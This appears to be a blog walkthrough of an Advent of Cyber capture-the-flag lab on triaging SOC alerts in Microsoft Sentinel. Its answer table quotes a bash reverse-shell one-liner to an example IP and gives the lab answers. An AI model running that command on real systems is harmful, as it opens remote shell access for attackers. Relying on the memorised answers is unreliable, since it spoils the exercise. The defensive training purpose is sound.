Advent of Cyber - DAY-10
🎄 Day 10 – Triaging the Storm: McSkidy vs. the Evil Bunnies in Azure Sentinel
Introduction
At The Best Festival Company (TBFC), the Security Operations Center erupted into chaos. Screens flashed red, alarms echoed like digital thunder, and alerts poured in like a monsoon. Elves sprinted between consoles, their faces illuminated by urgent warnings. Something was clearly wrong.
Rumors soon pointed to a familiar enemy: the Evil Easter Bunnies.
As alerts overwhelmed the SOC, McSkidy knew a crucial rule for survival:
Not every alert deserves your time — triage is everything.
🎯 Learning Objectives
In this exercise, you will learn how to:
-
Perform alert triage and prioritization in a SOC environment
-
Navigate and analyze alerts in Microsoft Sentinel
-
Correlate logs to uncover the true attacker actions
-
Build structured timelines for effective incident response
⚡ Alert Triaging Primer
When alerts flood the SOC, jumping into each one without evaluation leads to chaos. Some alerts are false positives, others are noise, and a few signal a real attack in progress.
Alert triage helps you determine:
-
What must be handled immediately
-
What can safely wait
-
What can be ignored
Without this structured approach, SOC operations become overwhelming.
📝 The Four Dimensions of Triage
| Factor | Description | Why It Matters |
|---|---|---|
| Severity Level | Informational → Critical | Indicates urgency & business risk |
| Timestamp & Frequency | When and how often the alert occurred | Reveals patterns or ongoing attacks |
| Attack Stage | Kill-chain stage | Shows attacker progress |
| Affected Asset | Targeted users, systems, resources | Determines potential impact and priority |
In short:
Severity = How bad?
Time = When?
Context = Where in the attack lifecycle?
Impact = Who is affected?
🛠️ Investigation Process
Once an alert is prioritized:
-
Investigate alert details
-
Check related logs
-
Correlate alerts across entities
-
Build a timeline of attacker activity
-
Decide on escalation, further investigation, or closure
-
Document findings
This structured workflow allows analysts to convert alert chaos into actionable intelligence.
🔌 Environment Setup in Azure Sentinel
To prepare for triage:
-
Open Microsoft Sentinel in the Azure portal.
-
Navigate to
Syslog_CLin the Logs tab. -
Allow logs to ingest fully.
-
Go to Analytics → Disable all rules → Re-enable to generate incidents.
The SOC simulation environment is now ready for investigation.
🚨 High-Severity Alerts
In the Incidents tab, McSkidy starts with the highest-severity alerts. One stands out:
Linux Privilege Escalation – Kernel Module Insertion
-
Three related events
-
Three entities involved
-
Classified under Privilege Escalation
-
Recent timestamps indicate an ongoing attack
Example Attack Flow:
| Alert | Indication |
|---|---|
| Root SSH login from external IP | Initial access |
| SUID discovery | Privilege escalation attempt |
| Kernel module insertion | Persistence achieved |
The puzzle pieces are coming together.
🔎 Diving Deeper – Raw Log Analysis
Using KQL in Sentinel, McSkidy queries app-02:
Findings:
-
cpcommand copying shadow file -
User Alice added to
sudoers -
backupusermodified byroot -
Malicious kernel module
malicious_mod.koinserted -
Successful root SSH login
-
Suspicious privilege escalation patterns
These behaviors confirm a coordinated compromise.
✅ Investigation Answers
| Question | Answer |
|---|---|
Kernel module installed in websrv-01? | malicious_mod.ko |
Unusual command executed by ops user in websrv-01? | /bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1 |
Source IP for first successful SSH login to storage-01? | 172.16.0.12 |
External IP that logged in as root to app-01? | 203.0.113.45 |
User added to sudoers on app-01 besides backupuser? | deploy |
🏁 Conclusion
Day 10 highlights the art and science of SOC alert triage. Through Microsoft Sentinel, McSkidy transformed overwhelming alerts into actionable intelligence by:
-
Prioritizing alerts effectively
-
Understanding the context of related events
-
Correlating attacker activity
-
Analyzing logs deeply
-
Mapping the attacker’s sequence
Even clever attackers like the Evil Bunnies can be countered with structured triage and proactive SOC workflows.
Lesson: In a SOC, clarity comes from prioritization. Every alert has a story—your job is to read it carefully.



Comments
Post a Comment